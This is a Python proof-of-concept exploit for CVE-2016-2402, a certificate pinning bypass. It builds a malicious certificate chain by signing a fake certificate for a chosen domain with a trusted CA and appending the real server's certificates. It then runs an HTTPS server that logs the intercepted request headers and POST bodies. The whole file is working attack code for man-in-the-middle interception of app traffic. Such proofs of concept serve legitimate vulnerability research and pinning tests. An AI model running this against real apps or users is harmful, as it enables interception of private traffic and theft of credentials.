README.md
Rendering markdown...
#!/usr/bin/python3
# John Kozyrakis
import tempfile
from http.server import BaseHTTPRequestHandler, HTTPServer
import ssl
import argparse
import logging
import os
import sys
from OpenSSL import crypto, SSL
import socket
class ServerHandler(BaseHTTPRequestHandler):
    """HTTP handler that logs whatever an intercepted client sends.

    Neither handler writes an HTTP response; the handlers only log the
    request line, the headers and (for POST) the request body.
    """

    def do_GET(self):
        """Log the request line and headers of an intercepted GET request."""
        logging.debug("intercepted GET request. If you see data from the client here, the attack worked.")
        self.log_request()
        logging.debug(self.headers)

    def do_POST(self):
        """Log an intercepted POST request.

        The request line is always logged. Headers and body are logged only
        when the request path does not contain the substring "tracking".
        """
        logging.debug("")
        logging.debug(
            "intercepted POST request to %s. If you see data from the client here, the attack worked." % self.path)
        self.log_request()
        if "tracking" in self.path:
            return
        logging.debug(self.headers)
        content = self.rfile.read(self._declared_body_length())
        logging.debug(content)

    def _declared_body_length(self):
        """Return the Content-Length announced by the client, or 0.

        A missing, non-numeric or negative header yields 0 so that a
        malformed request cannot crash the handler or make ``rfile.read``
        block waiting for end-of-stream.
        """
        raw_length = self.headers.get('Content-Length')
        try:
            length = int(raw_length)
        except (TypeError, ValueError):
            return 0
        return max(length, 0)
def gen_malicious_chain(domain):
    """Write the malicious certificate chain for *domain* to the temp file.

    Reads the module-level ``CA_CERT``/``CA_KEY`` paths, ``args.mode`` and
    ``tempMaliciousChainFile``. The file receives, in this order: a freshly
    generated end-entity certificate signed by the CA, its private key and,
    only when ``args.mode == 'attack'``, every certificate presented by the
    real server on port 443.

    NOTE(review): relative CA paths are resolved against the directory of
    this script, whereas the start-up check uses ``os.path.isfile`` on the
    raw path (i.e. relative to the working directory) - confirm which one is
    intended.
    """
    script_dir = os.path.dirname(__file__)

    # load CA certificate and key; `with` closes the files deterministically
    with open(os.path.join(script_dir, CA_CERT)) as ca_cert_file:
        trusted_ca_cert = crypto.load_certificate(crypto.FILETYPE_PEM, ca_cert_file.read())
    with open(os.path.join(script_dir, CA_KEY)) as ca_key_file:
        trusted_ca_key = crypto.load_privatekey(crypto.FILETYPE_PEM, ca_key_file.read())

    # generate a new end-entity certificate for a given domain signed by our trusted CA
    [(end_entity_cert, end_entity_key)] = generate_end_entity_cert(domain, trusted_ca_cert, trusted_ca_key)
    tempMaliciousChainFile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, end_entity_cert))
    tempMaliciousChainFile.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, end_entity_key))
    logging.debug("Generated end-entity cert & key, signed by the provided CA. Adding these to the malicious chain")

    upstream_certs = get_upstream_certs(domain, 443)
    logging.info("Retrieved the certificates used by the real %s (%s in total)" % (domain, len(upstream_certs)))

    if args.mode == 'attack':
        for cert in upstream_certs:
            tempMaliciousChainFile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
        logging.info("The upstream certificates WILL be added to the malicious client chain")
    else:
        logging.info("The upstream certificates will NOT be added to the malicious client chain")

    # The file is later loaded by *name*, not through this handle, so the
    # buffered PEM data has to reach the disk before anyone opens it.
    tempMaliciousChainFile.flush()
def generate_end_entity_cert(domain, cacert, cakey):
    """Create a one-year end-entity certificate for *domain* signed by a CA.

    Args:
        domain: Value placed in the certificate subject's CN.
        cacert: CA certificate; its subject becomes the new cert's issuer.
        cakey: CA private key used to sign the new certificate.

    Returns:
        A single-element list ``[(certificate, private_key)]`` holding the
        new certificate and its freshly generated 2048-bit RSA key.
    """
    skey = crypto.PKey()
    skey.generate_key(crypto.TYPE_RSA, 2048)

    scert = crypto.X509()
    scert.get_subject().CN = domain  # This is where the domain fits
    scert.set_issuer(cacert.get_subject())
    scert.gmtime_adj_notBefore(0)
    scert.gmtime_adj_notAfter(365 * 24 * 60 * 60)
    # RFC 5280 requires a positive serial that is unique per issuer; a fixed
    # 0 collides as soon as a second certificate is issued by the same CA.
    scert.set_serial_number(int.from_bytes(os.urandom(16), "big") or 1)
    scert.set_pubkey(skey)
    # SHA-1 signatures are rejected by current TLS stacks; use SHA-256.
    scert.sign(cakey, "sha256")
    return [(scert, skey)]
def get_upstream_certs(host, port):
    """Fetch the certificate chain that the real server presents.

    Opens a TLS connection to ``(host, port)``, performs the handshake and
    returns the peer's certificate chain. No certificate verification is
    configured on the context.

    Args:
        host: Host name to connect to; also sent as the SNI server name.
        port: TCP port to connect to.

    Returns:
        The list of certificates sent by the peer (empty if none was sent).
    """
    context = SSL.Context(SSL.SSLv23_METHOD)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        connection = SSL.Connection(context, sock)
        # Send SNI so that virtual-hosted servers return the chain for
        # `host` instead of their default certificate.
        connection.set_tlsext_host_name(host.encode("idna"))
        connection.connect((host, port))
        try:
            connection.do_handshake()
        except SSL.WantReadError:
            logging.error("Timeout")
            cleanup()
        # Normalise a missing chain to an empty list so callers can always
        # use len() and iterate over the result.
        return connection.get_peer_cert_chain() or []
    finally:
        # Runs on normal return and when cleanup() exits the process.
        sock.close()
def cleanup():
    """Close the temporary chain file (if it exists) and exit with status 1.

    The script calls this while validating its arguments, i.e. before the
    module-level ``tempMaliciousChainFile`` has been created, so the file is
    looked up defensively instead of being referenced directly.

    Raises:
        SystemExit: always, with exit code 1.
    """
    chain_file = globals().get("tempMaliciousChainFile")
    if chain_file is not None:
        chain_file.close()
    logging.error("Exiting")
    sys.exit(1)
# ---------------------------------------------------------------------------
# Script entry: parse arguments, build the malicious chain, serve HTTPS.
# The names args, CA_CERT, CA_KEY and tempMaliciousChainFile are module-level
# on purpose: the functions above read them as globals.
# ---------------------------------------------------------------------------
logging.basicConfig(level=logging.DEBUG)
logging.info("Certificate Pinning bypass POC - CVE-2016-2402 - https://koz.io/pinning-cve-2016-2402")

parser = argparse.ArgumentParser(
    prog='Certificate Pinning bypass POC',
    description='''This utility will set up a HTTPS server that uses a malicious certificate chain for a specific domain.
If traffic of a vulnerable app is redirected to this server, certificate pinning for that domain will bypassed.
See https://koz.io/pinning-cve-2016-2402 for more details.''',
    epilog='''@ikoz - John Kozyrakis''')
parser.add_argument("-d", "--domain", help="Domain name to be intercepted", required=True)
parser.add_argument("-p", "--port", help="Web server port number", type=int, default=443)
parser.add_argument("-c", "--cacert", help="CA certificate that the host system trusts (PEM)", default="CA_CERT.pem")
parser.add_argument("-k", "--cakey", help="Private key of CA that the host system trusts (PEM)", default="CA_KEY.pem")
parser.add_argument("-m", "--mode", help="Add upstream certificates to chain (or not)",
                    choices=['attack', 'no-attack'], required=True)
# NOTE: --verbose is accepted but not consulted anywhere below; the log level
# is always DEBUG.
parser.add_argument("-v", "--verbose", help="increase output verbosity",
                    action="store_true")
args = parser.parse_args()

logging.info("Will intercept domain %s" % args.domain)
logging.info("Will use CA certificate %s with private key %s" % (args.cacert, args.cakey))
CA_CERT = args.cacert  # certificate of CA that the host system trusts
CA_KEY = args.cakey  # private key of CA that the host system trusts

# Created before the validation below because cleanup() closes this file;
# creating it later made the error paths fail with NameError.
tempMaliciousChainFile = tempfile.NamedTemporaryFile()

if not os.path.isfile(CA_CERT):
    logging.error("CA_CERT %s is not a valid file" % CA_CERT)
    cleanup()
if not os.path.isfile(CA_KEY):
    logging.error("CA_KEY %s is not a valid file" % CA_KEY)
    cleanup()

gen_malicious_chain(args.domain)

logging.info(
    "Starting web server - listening at port %s. Redirecting traffic for %s to this server will bypass any pinning and "
    "show the requests here" % (
        args.port, args.domain))
logging.info("Use Ctrl+C to stop the server")

try:
    httpd = HTTPServer(("localhost", args.port), ServerHandler)
except PermissionError:
    logging.error("PermissionError: Cannot start server on port %s. Please use sudo or a port >1024" % args.port)
    cleanup()
except Exception:
    logging.exception("Exception")
    cleanup()

# The chain file is loaded by name, so buffered writes must be on disk first.
tempMaliciousChainFile.flush()

# ssl.wrap_socket() was removed in Python 3.12; an explicit SSLContext is the
# supported way to load the chain and wrap the listening socket.
tls_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
tls_context.load_cert_chain(certfile=tempMaliciousChainFile.name)
httpd.socket = tls_context.wrap_socket(httpd.socket, server_side=True)

try:
    httpd.serve_forever()
except KeyboardInterrupt:
    # Ctrl+C is the documented way to stop the server; exit without a traceback.
    logging.info("Stopping web server")
finally:
    httpd.server_close()
    tempMaliciousChainFile.close()